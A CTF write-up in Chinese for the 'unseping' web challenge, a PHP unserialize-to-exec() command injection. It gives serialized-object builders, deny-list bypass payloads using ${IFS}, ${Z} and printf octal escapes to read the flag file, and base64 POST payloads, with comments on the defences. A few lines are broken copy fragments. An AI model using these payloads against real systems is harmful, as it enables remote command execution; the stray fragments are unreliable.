攻防世界-unseping
18最佳Writeup由 shuita111 提供WriteUP
难度:1
方向:Web
题解数:1
解出人数:255
题目来源: 江苏工匠杯
题目描述:
unseping
题目场景:
<?php
// Discloses this file's own source to every visitor (intended here: the challenge is white-box).
highlight_file(__FILE__);
class ease{
// Deserialisation gadget: the only state is a method name and an argument list, and both
// are supplied by whoever produced the serialized string handed to unserialize() below.
private $method;
private $args;
function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
}
// Fires when the object is freed, i.e. right after unserialize() returns, so the supplied
// $method/$args reach call_user_func_array() without any request-level authorisation.
// in_array() is used without the strict flag, so a loosely-equal value (e.g. boolean true)
// also passes the allow-list check.
function __destruct(){
if (in_array($this->method, array("ping"))) {
call_user_func_array(array($this, $this->method), $this->args);
}
}
// Despite the name, $ip is handed to exec() verbatim as a shell command line and the output
// is echoed back: a direct command-injection sink. A safe version runs a fixed binary and
// passes the host through escapeshellarg() after validating it as an IP/hostname.
function ping($ip){
exec($ip, $result);
var_dump($result);
}
// Deny-list filter on a handful of substrings and shell metacharacters. A deny-list cannot
// enumerate every spelling the shell accepts for the same command (the payloads in this
// write-up use variable expansion, ${IFS} and printf octal escapes), so it is a speed bump,
// not a boundary. Note the else branch has no return: a rejected argument becomes null in
// $args rather than being dropped, and the only signal is the echoed text.
function waf($str){
if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
return $str;
} else {
echo "don't hack";
}
}
// The only filtering step in the chain runs from __wakeup(). Anything that prevents
// __wakeup() from being invoked (historically a property count in the serialized header
// larger than the real one, on unpatched older PHP builds) skips waf() entirely.
function __wakeup(){
foreach($this->args as $k => $v) {
$this->args[$k] = $this->waf($v);
}
}
}
// Entry point: attacker-controlled POST data is base64-decoded and passed straight to
// unserialize(), so any loaded class with __wakeup()/__destruct() becomes reachable (here: ease).
// The @ operators hide the notices a malformed payload would otherwise raise.
// Fix: never unserialize untrusted input; use json_decode() for data interchange, and log
// decoded request bodies that begin with "O:" as a detection signal.
$ctf=@$_POST['ctf'];
@unserialize(base64_decode($ctf));
?>
<?php
// Left over from the challenge listing; prints this local script's source.
highlight_file(__FILE__);
// Local copy of the challenge class. It is needed only so serialize() emits the same class
// name and private-property names (serialized with the class name mangled in); its
// __destruct() is live here as well, so a "ping" object runs its argument on this machine
// when the script ends.
class ease{
private $method;
private $args;
function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
}
// Allow-list check without the strict flag; the listed method is then invoked with $args.
function __destruct(){
if (in_array($this->method, array("ping"))) {
call_user_func_array(array($this, $this->method), $this->args);
}
}
// $ip is executed verbatim as a shell command line (command-injection sink).
function ping($ip){
exec($ip, $result);
var_dump($result);
}
// Deny-list filter; on a match it echoes and falls through, returning null.
function waf($str){
if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
return $str;
} else {
echo "don't hack";
}
}
// Only filtering step; runs on deserialisation, never on construction.
function __wakeup(){
foreach($this->args as $k => $v) {
$this->args[$k] = $this->waf($v);
}
}
}
// $ctf=@$_POST['ctf'];
// @unserialize(base64_decode($ctf));
// Local harness: builds the serialized strings and prints them raw and base64-encoded.
// Method "ls" is not on the allow-list, so this first object never reaches exec().
$obj=new ease("ls","ls //");
$str=serialize($obj);
echo $str,PHP_EOL;
// Rewrites the header to "O:+4" with a property count (3) larger than the real one (2).
// On unpatched older PHP builds such a mismatch skipped __wakeup(), i.e. the waf() pass;
// on current builds unserialize() fails on it instead.
// Bug: str_replace() replaces every ':2:', including the 's:2:' length prefix of the "ls"
// method value, so the result is malformed. The later payloads do not use this variant.
$str=str_replace('O:4','O:+4',$str);
$str=str_replace(':2:',':3:',$str);
echo $str;
echo base64_encode($str);
//--------------------------------
echo "</br>";
//$a=new ease("ping",array('test point'));
// "pwd" contains none of the deny-listed substrings and passes waf() unchanged.
// Note: __destruct() executes it locally at script end as well.
$a= new ease("ping",array('pwd'));
$b=serialize($a);
echo $b;
echo base64_encode($b);
?>
// ${Z} is an unset shell variable that expands to nothing, so the filter sees 'l${Z}s'
// while the shell runs 'ls'. The deny-list matches literal substrings only; a filter
// should reject '$', '{', backticks and '(' outright rather than list command names.
$a = new ease("ping",array('l${Z}s'));
$b=serialize($a);
echo $b;
echo base64_encode($b);
?>
//Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czo2OiJsJHtafXMiO319
// Same idea extended: ${IFS} (the shell's field separator) stands in for the blocked space,
// and ${Z} splits the blocked words "ls" and "flag". Decoded request bodies containing
// '${IFS}' or '${' are a high-confidence detection signal for this bypass family.
$a = new ease("ping",array('l${Z}s${IFS}f${Z}lag_1${Z}s_here'));
$b=serialize($a);
echo $b;
echo base64_encode($b);
//Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozMjoibCR7Wn1zJHtJRlN9ZiR7Wn1sYWdfMSR7Wn1zX2hlcmUiO319
flag_1s_here/flag_831b69012c67b35f.php
访问空白!
貌似是 unicode 编码 $(printf “\154\163”)，但好像并不是 unicode 编码
\154\163怎么就能代替ls了!?
印象中“\”开头的是八进制，这会不会是 ASCII 码
\154 = 4 + 5×8 + 1×8² = 4 + 40 + 64 = 108，对应 ASCII 码 "l"
\163 = 3 + 6×8 + 1×8² = 3 + 48 + 64 = 115，对应 ASCII 码 "s"
根据这个思路我写了一段 C 语言代码
#include <stdio.h>
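/*
 * Print every byte of `site` as a backslash-octal escape ("\143\141...").
 * The original loop bound `i < sizeof site / sizeof site[0]` also covered the
 * terminating '\0', so a stray "\0" was emitted at the end; the bound below
 * stops one short of sizeof. Returns 0.
 */
int main(void)
{
    char site[] = "cat flag_1s_here/flag_831b69012c67b35f.php";
    /* size_t avoids the signed/unsigned comparison against sizeof. */
    for (size_t i = 0; i + 1 < sizeof site; i++) {
        /* Cast so a byte >= 0x80 is not sign-extended to a negative value for %o. */
        printf("\\%o", (unsigned char)site[i]);
    }
    return 0;
}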
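#!/usr/bin/python3
# Emit the command string as backslash-octal escapes, the form printf decodes
# (the same transformation as the C snippet above).
# Fix: the shebang was missing the '!' and so was not honoured by the loader.
s = "cat flag_1s_here/flag_831b69012c67b35f.php"
s1 = ''
# ord() gives the code point as an int; oct() formats it as '0o...'.
for i in s:
    print(oct(ord(i)))
    # Drop the '0o' prefix and prepend a backslash.
    s1 = s1 + '\\' + str(oct(ord(i)))[2:]
print(s1)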
#运行结果
┌──(kwkl㉿kwkl)-[~/HODL]
└─$ /bin/python3 /home/kwkl/HODL/adworld/web/unseping/c.py
0o143
0o141
0o164
0o40
0o146
0o154
0o141
0o147
0o137
0o61
0o163
0o137
0o150
0o145
0o162
0o145
0o57
0o146
0o154
0o141
0o147
0o137
0o70
0o63
0o61
0o142
0o66
0o71
0o60
0o61
0o62
0o143
0o66
0o67
0o142
0o63
0o65
0o146
0o56
0o160
0o150
0o160
\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160
$(printf “\154\163”)
组合一个poc:
$(printf “\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160”)
{Z}s{Z}lag_1${Z}s_here’));
{Z}s{Z}lag_1${Z}s_here’));
(printf${IFS}“\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160”)'));
————————————————
<?php
// Left over from the challenge listing; prints this local script's source.
highlight_file(__FILE__);
// Local copy of the challenge class, kept so serialize() emits the same class name and
// private-property names. __destruct() is live here too: a "ping" object executes its
// argument on this machine when the script ends.
class ease{
private $method;
private $args;
function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
}
// Allow-list check without the strict flag; the listed method is then invoked with $args.
function __destruct(){
if (in_array($this->method, array("ping"))) {
call_user_func_array(array($this, $this->method), $this->args);
}
}
// $ip is executed verbatim as a shell command line (command-injection sink).
function ping($ip){
exec($ip, $result);
var_dump($result);
}
// Deny-list filter; on a match it echoes and falls through, returning null.
function waf($str){
if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
return $str;
} else {
echo "don't hack";
}
}
// Only filtering step; runs on deserialisation, never on construction.
function __wakeup(){
foreach($this->args as $k => $v) {
$this->args[$k] = $this->waf($v);
}
}
}
// $ctf=@$_POST['ctf'];
// @unserialize(base64_decode($ctf));
// Local harness: builds the serialized strings and prints them raw and base64-encoded.
// Method "ls" is not on the allow-list, so this first object never reaches exec().
$obj=new ease("ls","ls //");
$str=serialize($obj);
echo $str,PHP_EOL;
// Header rewrite to "O:+4" with an inflated property count (historic __wakeup() skip on
// unpatched older PHP builds). Bug: str_replace() also rewrites the 's:2:' length prefix
// of the "ls" method value, so this string is malformed; the final payload does not use it.
$str=str_replace('O:4','O:+4',$str);
$str=str_replace(':2:',':3:',$str);
echo $str;
echo base64_encode($str);
//--------------------------------
echo "</br>";
//$a=new ease("ping",array('test point'));
//$a= new ease("ping",array('pwd'));
//$a = new ease("ping",array('l${Z}s'));
//$a = new ease("ping",array('l${Z}s${IFS}f${Z}lag_1${Z}s_here'));
// Final payload: $(printf ...) command substitution decodes the octal escapes at run time,
// so none of the deny-listed words appears literally and only ${IFS} replaces the space.
// Defensive takeaway: the filter is bypassed because it inspects the text, not what the
// shell will evaluate; the real fix is not to pass user data to exec() at all.
$a = new ease("ping",array('$(printf${IFS}"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160")'));
$b=serialize($a);
echo $b;
echo base64_encode($b);
?>
Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozMjoibCR7Wn1zJHtJRlN9ZiR7Wn1sYWdfMSR7Wn1zX2hlcmUiO319
一定要用post方法!
ctf=Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozMjoibCR7Wn1zJHtJRlN9ZiR7Wn1sYWdfMSR7Wn1zX2hlcmUiO319
Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czoxNjk6IiQocHJpbnRmJHtJRlN9IlwxNDNcMTQxXDE2NFw0MFwxNDZcMTU0XDE0MVwxNDdcMTM3XDYxXDE2M1wxMzdcMTUwXDE0NVwxNjJcMTQ1XDU3XDE0NlwxNTRcMTQxXDE0N1wxMzdcNzBcNjNcNjFcMTQyXDY2XDcxXDYwXDYxXDYyXDE0M1w2Nlw2N1wxNDJcNjNcNjVcMTQ2XDU2XDE2MFwxNTBcMTYwIikiO319